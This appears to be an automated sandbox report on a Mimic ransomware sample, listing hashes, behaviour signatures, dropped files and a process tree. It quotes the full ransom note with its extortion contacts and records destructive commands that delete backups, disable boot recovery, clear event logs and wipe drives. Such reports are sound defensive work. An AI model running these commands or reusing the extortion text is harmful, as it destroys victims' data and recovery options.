Resubmissions

29-11-2024 15:57

241129-td12ysylek 10

Analysis

  • max time kernel
    397s
  • max time network
    392s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-de
  • resource tags
    arch:x64, arch:x86, image:win11-20241007-de, locale:de-de, os:windows11-21h2-x64, system, windows
  • submitted
    29-11-2024 15:57

General

  • Target

    lsass.exe

  • Size

    2.3MB

  • MD5

    131f1e70e37f54ca486f111b596ea4ce

  • SHA1

    b460653cb8a5294711d70a6a240100fbbb475b30

  • SHA256

    c09333024c035b820003b8af59cbba362bfcdc5e2308fc8027dca324e0666c2c

  • SHA512

    128b4e0946e1cc0227bb21a385a8df9ced6e12235fac99a506ec7e18c63806dc6e429eab6f21b971217433d68b8efc19f8c0006a5d53126fe21673ad9254caf5

  • SSDEEP

    49152:wgwRAifu1DBgutBPNN52/N+0MgrMPR9JZqoUGKv1dHNUv+/C:wgwRAvguPPFeNvuRZqfD1l8L

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\How-to-decrypt.txt

Ransom Note
|!!!| Hello |!!!| ---> DON'T ignore this and check ALL INFO carefully!!! *** About situation: ALL your important files have been encrypted and ALL sensitive information also leaked! This modification is reversible and data remain safe! Encrypting your data is only proof , we only interested money, we don't want to damage your reputation , don't want to harm your work, not make a DDOS attack on your infrastructure - we only check and uploaded your files! *** IF WE DO NOT FIND A COMMON LANGUAGE: ---> All encrypted data be irretrievably lost. ---> Leaked data will be published or sold on black-market (or to competitors). This will be followed by serious consequences and all your customers\partners and special services will be notified about it! !!! FOLLOW INSTRUCTIONS TO AVOID IRREVERSIBLE CONSEQUENCES !!! !!!YOU NEED ASAP CONTACT WITH US TO DEAL THIS!!! Our contacts will be provided below! **************************************** !!! WARNING !!! DON'T use any third party software for restoring your data or antivirus solutions! DO NOT MODIFY ENCRYPTED FILES! DO NOT RENAME ENCRYPTED FILES! - it's may entail damage of the private key and, as result - you loss all data. !!!No software and services available on internet can help you!!! !!! Decryption of your files with the help of third parties may cause increased price (they add their fee to our and they usually fail) or you can become a victim of a scam. **************************************** REMINDING: It's in your interests to get your files back and safe all lost files,docs,bases. We have your highly confidential/personal data. These data are currently stored on a private server(cloud)! ---> After payment this cloud will be deleted and your data stay safe! We guarantee complete anonymity and can provide you with proof and guaranties from our side and our best specialists make everything for restoring, but please should not interfere without us. 
|!!!| IF YOU DON'T CONTACT US WITHIN 48 HOURS FROM MOMENT OF LOCK YOUR SERVERS - WE START LOOKING CLIENTS FOR SELL YOUR DATA IN OUR PRIVATE CHANNELS AND PRICE WILL BE HIGHER. |!!!| ---------------------------------------- Your unique ID is: zcrtZ5mEyw9AsBqgfcOeawBsog36voiyp2_Vj7syEFE*LOQUI Send this ID when you will contact us!. ---------------------------------------- *** HOW TO CONTACT US: Just write us an email to this mail(s): [email protected] [email protected] * To ANONIMOUS contact with us, create a new free email account on the site: onionmail.org (recommended)( REGISTER IN TOR BROWSER: http://pflujznptk5lmuf6xwadfqy6nffykdvahfbljh7liljailjbxrgvhfid.onion/ ) , tutanota.com * To avoid having your email blocked and get spam filters, send private information (such as your private key) with the private notes service: privnote.com, 1ty.me, www.private-notes.com If you do not receive a reply within 24 hours or do not receive a response to your following messages, contact us with another email or through qTox! ! add our mails to contacts so as not to lose letters from us ! !!! check your spam sometimes, our emails may get there !!! !!! for a quick contact with us or if you will not receive our letters !!! download qTox and ADD our TOXID. our individual key(TOXID): 3A381C022C1F235748B069D7B242A53CE6C74BBB4ED16C8FFAA1183B92C2E469DDD27F45A6EF How to download qTOX messenger: https://tox.chat/download.html https://github.com/qTox/qTox/releases/download/v1.17.3/setup-qtox-x86_64-release.exe
URLs

http://pflujznptk5lmuf6xwadfqy6nffykdvahfbljh7liljailjbxrgvhfid.onion/

https://tox.chat/download.html

https://github.com/qTox/qTox/releases/download/v1.17.3/setup-qtox-x86_64-release.exe

Signatures

  • Detects Mimic ransomware 1 IoCs
  • Mimic

    Ransomware family first observed in the wild in 2022.

  • Mimic family
  • UAC bypass 3 TTPs 4 IoCs
  • Clears Windows event logs 1 TTPs 3 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (187) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies system executable filetype association 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Power Settings 1 TTPs 15 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs a command via powershell.exe.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 16 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 20 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 42 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 13 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\lsass.exe
    "C:\Users\Admin\AppData\Local\Temp\lsass.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe
      "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe" i
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:5052
    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe
      "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe" x -y -p2441418567841718753 Everything64.dll
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:276
    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\ENC_chesniybro_chesniybro_2022-12-06_15-32-01=LOQUI.exe
      "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\ENC_chesniybro_chesniybro_2022-12-06_15-32-01=LOQUI.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Modifies system executable filetype association
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4672
      • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe
        "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe"
        3⤵
        • UAC bypass
        • Event Triggered Execution: Image File Execution Options Injection
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies system executable filetype association
        • Adds Run key to start application
        • Checks whether UAC is enabled
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:1604
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c DC.exe /D
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3636
          • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\DC.exe
            DC.exe /D
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4552
        • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe
          "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe" -e watch -pid 1604 -!
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4956
        • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe
          "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe" -e ul1
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3820
        • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe
          "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe" -e ul2
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4196
        • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\Everything.exe
          "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\Everything.exe" -startup
          4⤵
          • Executes dropped EXE
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:2996
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -H off
          4⤵
          • Power Settings
          PID:5096
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
          4⤵
          • Power Settings
          PID:2472
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
          4⤵
          • Power Settings
          PID:2596
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
          4⤵
          • Power Settings
          PID:3984
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
          4⤵
          • Power Settings
          PID:132
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
          4⤵
          • Power Settings
          PID:3144
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
          4⤵
          • Power Settings
          PID:3120
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
          4⤵
          • Power Settings
          PID:556
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
          4⤵
          • Power Settings
          PID:3028
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
          4⤵
          • Power Settings
          PID:4124
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
          4⤵
          • Power Settings
          PID:1000
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
          4⤵
          • Power Settings
          PID:1600
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
          4⤵
          • Power Settings
          PID:2528
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
          4⤵
          • Power Settings
          PID:748
        • C:\Windows\SYSTEM32\powercfg.exe
          powercfg.exe -S e9a42b02-d5df-448d-aa00-03f14749eb61
          4⤵
          • Power Settings
          PID:4872
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ExecutionPolicy Bypass "Get-VM | Stop-VM"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:3704
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ExecutionPolicy Bypass "Get-VM | Select-Object vmid | Get-VHD | %{Get-DiskImage -ImagePath $_.Path; Get-DiskImage -ImagePath $_.ParentPath} | Dismount-DiskImage"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:3164
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ExecutionPolicy Bypass "Get-Volume | Get-DiskImage | Dismount-DiskImage"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:4876
        • C:\Windows\SYSTEM32\bcdedit.exe
          bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:4008
        • C:\Windows\SYSTEM32\bcdedit.exe
          bcdedit.exe /set {default} recoveryenabled no
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:3300
        • C:\Windows\SYSTEM32\wbadmin.exe
          wbadmin.exe DELETE SYSTEMSTATEBACKUP
          4⤵
          • Deletes System State backups
          PID:3872
        • C:\Windows\SYSTEM32\wbadmin.exe
          wbadmin.exe delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:2524
        • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\Everything.exe
          "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\Everything.exe" -startup
          4⤵
          • Executes dropped EXE
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:1748
        • C:\Windows\SysWOW64\notepad.exe
          notepad.exe "C:\Users\Admin\AppData\Local\How-to-decrypt.txt"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2572
        • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\xdel.exe
          "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\xdel.exe" -accepteula -p 1 -c C:\
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4064
        • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\xdel.exe
          "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\xdel.exe" -accepteula -p 1 -c F:\
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2428
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil.exe cl security
          4⤵
          • Clears Windows event logs
          • System Location Discovery: System Language Discovery
          PID:4820
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil.exe cl system
          4⤵
          • Clears Windows event logs
          • System Location Discovery: System Language Discovery
          PID:4372
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil.exe cl application
          4⤵
          • Clears Windows event logs
          • System Location Discovery: System Language Discovery
          PID:3220
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /d /c "ping 127.2 -n 5 & fsutil file setZeroData offset=0 length=20000000 "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe" & cd /d "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}" & Del /f /q /a *.exe *.ini *.dll *.bat *.db"
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          PID:3680
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.2 -n 5
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2908
          • C:\Windows\SysWOW64\fsutil.exe
            fsutil file setZeroData offset=0 length=20000000 "C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\dwm.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4056
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2236
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:1696
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\How-to-decrypt.txt
    1⤵
    PID:3524
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    PID:4156
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\temp\MIMIC_LOG.txt
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:3204
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:4952
  • C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    1⤵
    PID:4524
  • C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding
    1⤵
    PID:3796
  • C:\Windows\System32\vds.exe
    C:\Windows\System32\vds.exe
    1⤵
    • Checks SCSI registry key(s)
    PID:3712
  • C:\Windows\system32\dwm.exe
    "dwm.exe"
    1⤵
    • Modifies data under HKEY_USERS
    PID:3496
  • C:\Windows\system32\dwm.exe
    "dwm.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Modifies data under HKEY_USERS
    PID:1448
  • C:\Windows\system32\dwm.exe
    "dwm.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Modifies data under HKEY_USERS
    PID:392
  • C:\Windows\system32\dwm.exe
    "dwm.exe"
    1⤵
    • Modifies data under HKEY_USERS
    PID:1848
  • C:\Windows\system32\dwm.exe
    "dwm.exe"
    1⤵
    • Modifies data under HKEY_USERS
    PID:1060
  • C:\Windows\system32\dwm.exe
    "dwm.exe"
    1⤵
    PID:4548
  • C:\Windows\system32\dwm.exe
    "dwm.exe"
    1⤵
    • Modifies data under HKEY_USERS
    PID:2500
  • C:\Windows\system32\dwm.exe
    "dwm.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    PID:3324
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x00000000000004DC 0x00000000000004C8
    1⤵
    PID:1412
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0 /state0:0xa39f9855 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:3096
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:1532

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\How-to-decrypt.txt
    Filesize: 3KB
    MD5: e94b0909d3239d5164619d298bc2948e
    SHA1: afe26b8dea7b6ca946f4892a6cb9a4ee0f95a19a
    SHA256: 97a5107512568f04cfe07576f1ea780c848da5b669569c94ed1c84e3b228c1bc
    SHA512: 89ef84843ac99706bb1a129a9f3ea25b9d68eb5cf7835b2b547489fc2ef5caaf47eb114922e1adbbf48539c062cac456af917979d15c76df4c668d6ec6a7696d

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 2KB
    MD5: 627073ee3ca9676911bee35548eff2b8
    SHA1: 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
    SHA256: 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
    SHA512: 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 944B
    MD5: 2e8eb51096d6f6781456fef7df731d97
    SHA1: ec2aaf851a618fb43c3d040a13a71997c25bda43
    SHA256: 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
    SHA512: 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: fa72f16d921429c3d4529f54e726df59
    SHA1: c8e732127f403498271f61d53bf9ffa9906afdc4
    SHA256: 40196caa243bfb54e1d4cf6fadaca9249601cdf48d10c77407ba1fbde47e5567
    SHA512: 805a0b816105ad055c86ef549a5426fcddd221766d6aabd7446c1b58292ad9b8c3aa5cc34815b16e935f4b9ce69c2b513ec6fd774e8fcf580b8cffabd0c08400

  • C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd
    Filesize: 182B
    MD5: f3e14552ccc738c259183b1718a540c5
    SHA1: faaf5ef0267f0a1af2c889c6c5f4e488190802d1
    SHA256: da8c582047aa2356325368f4c97a598c9d9b02db2da6ba836ba412ac5720a9c5
    SHA512: 0d280669333de999804edec032da5c26400dcc71c855856cfeb84de50904c0450ab00227ef5bb98bfa316a740530062ce6a90559b7f4efc290e55a65d8118e7a

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe
    Filesize: 772KB
    MD5: b93eb0a48c91a53bda6a1a074a4b431e
    SHA1: ac693a14c697b1a8ee80318e260e817b8ee2aa86
    SHA256: ab15a9b27ee2d69a8bc8c8d1f5f40f28cd568f5cbb28d36ed938110203f8d142
    SHA512: 732cb0dcb2b1dac1a7462554c256cec27de243734f79b7f87026e9f5fbae6d5d8a5f14a702d2af0b65897b6abad70a9eff1905dc851ce267d221ddcdd9e640c5

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\DC.exe
    Filesize: 802KB
    MD5: ac34ba84a5054cd701efad5dd14645c9
    SHA1: dc74a9fd5560b7c7a0fc9d183de9d676e92b9e8b
    SHA256: c576f7f55c4c0304b290b15e70a638b037df15c69577cd6263329c73416e490e
    SHA512: df491306a3c8ddb580b7cca1dce9e22a87fd43ca3632f3630cdcbe114bef243e847b2ce774d688f6e142516f2e0fc49d30fad7c7168e627523da21e2fe06836a

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\ENC_chesniybro_chesniybro_2022-12-06_15-32-01=LOQUI.exe
    Filesize: 2.0MB
    MD5: 61333a904b47ecea8d13ea1403cf45ca
    SHA1: e02d57f84b9543483cb7db1a6ad893da3ea2504b
    SHA256: 6e781b4a318399a5c6885ef7273d76eec42c6ac7f66c6b20bbc9dcc84d3475ac
    SHA512: 26bf870b28b294b7b9413995a6439774889951f860c46cf36bfa91d7390ae484e059382ca7f767f377dfc46b8d60c25691aa1d40d61c1a86ac9a9cce3c8bdea3

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Everything.exe
    Filesize: 1.7MB
    MD5: c44487ce1827ce26ac4699432d15b42a
    SHA1: 8434080fad778057a50607364fee8b481f0feef8
    SHA256: 4c83e46a29106afbaf5279029d102b489d958781764289b61ab5b618a4307405
    SHA512: a0ea698333c21e59b5bc79d79ff39d185a019cede394dbd8b2eb72c4230001685a90098a691c296aeab27db6751eef56c4261cf00f790de2e9e9efc0e7f7c808

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Everything.ini
    Filesize: 548B
    MD5: 742c2400f2de964d0cce4a8dabadd708
    SHA1: c452d8d4c3a82af4bc57ca8a76e4407aaf90deca
    SHA256: 2fefb69e4b2310be5e09d329e8cf1bebd1f9e18884c8c2a38af8d7ea46bd5e01
    SHA512: 63a7f1482dc15d558e1a26d1214fcecca14df6db78c88735a67d1a89185c05210edc38b38e3e014dac817df88968aaf47beb40e8298777fbb5308abfe16479e4

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Everything2.ini
    Filesize: 550B
    MD5: 51014c0c06acdd80f9ae4469e7d30a9e
    SHA1: 204e6a57c44242fad874377851b13099dfe60176
    SHA256: 89ad2164717bd5f5f93fbb4cebf0efeb473097408fddfc7fc7b924d790514dc5
    SHA512: 79b5e2727cce5cd9f6d2e886f93b22b72ec0ad4a6b9ad47205d7cf283606280665ead729ab3921d7e84409cfc09a94e749a68918130f0172856626f5f7af010c

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Everything32.dll
    Filesize: 84KB
    MD5: 3b03324537327811bbbaff4aafa4d75b
    SHA1: 1218bd8165a2e0ec56a88b5a8bb4b27e52b564e7
    SHA256: 8cae8a9740d466e17f16481e68de9cbd58265863c3924d66596048edfd87e880
    SHA512: ba5312e1836bac0bb05b133b2b938be98b28646c8b8fc45804d7f252cd2e1a191667bfa8ba979bf2a07d49053114234b78cca83ef28aecf105d7169a3ec3dc62

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Everything64.dll
    Filesize: 1.3MB
    MD5: 9fa5143196457c29c5371d22d70bb091
    SHA1: dd2013f954e011486764e96885b454712abeea60
    SHA256: 19a6dcc14d735050667284f962d6b634a5a20c6fc6e73c091560c8b8b448fd32
    SHA512: cc0f5d6f32098638190530abb674c7d62d7c25689a2af9337c91724ab2e0d49f216b7766e1b1676b66848677c20f7d2d1ed264d0c3cf48b175caf7458a8d7382

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\xdel.exe
    Filesize: 350KB
    MD5: 803df907d936e08fbbd06020c411be93
    SHA1: 4aa4b498ae037a2b0479659374a5c3af5f6b8d97
    SHA256: e8eaa39e2adfd49ab69d7bb8504ccb82a902c8b48fbc256472f36f41775e594c
    SHA512: 5b9c44b4ed68b632360c66b35442722d2797807c88555c9fde9c176581d410e4f6ed433fabdcd9ee614db458158e6055a9f7f526ebfbc8e7f5f3d388f5de4532

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_snifetp3.dph.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

